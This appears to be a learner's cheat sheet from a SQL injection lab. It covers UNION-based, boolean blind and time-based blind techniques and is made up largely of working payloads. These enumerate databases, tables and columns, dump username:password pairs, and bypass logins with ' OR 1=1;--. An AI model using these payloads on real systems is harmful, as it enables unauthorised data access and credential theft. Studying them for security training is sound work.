- Check if there is a sqli vuln
- check how many columns are returned
1 UNION SELECT 1
0 UNION SELECT 1,2,3
- get the database name
0 UNION SELECT 1,2,database()
- get the tables in the database
0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
- get the column informations in the target table
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'
- get the content of the table
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
- Bypass login
' OR 1=1;--
Boolean Blind SQLi¶
Find a boolean-like api that takes parameters. Ensure the endpoint answers with false (no record from db returned). Now change the parameters so that your question results in a positive record from the database.
admin123' union select 1,2,3 where database() like 'sqli_three%';--
... over ...
admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--
... till ...
admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';
Every little step must be sent to seperately which is very tidious, but still effective.
This way a user can be enumerated and his password can be found (wordlists).
Timebased Blind SQLi¶
In case you don't even have a value-based indicator, you can utilize the time delay of a query.
This is done by actually doing quite the same as for the Boolean Blind SQLi but you use
sleep(1) to delay the result.
sleep(1) is only executed if the result of the query has an record because
sleep(1) is like a function that is executed on the column values.
admin123' UNION SELECT SLEEP(1),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'users%';--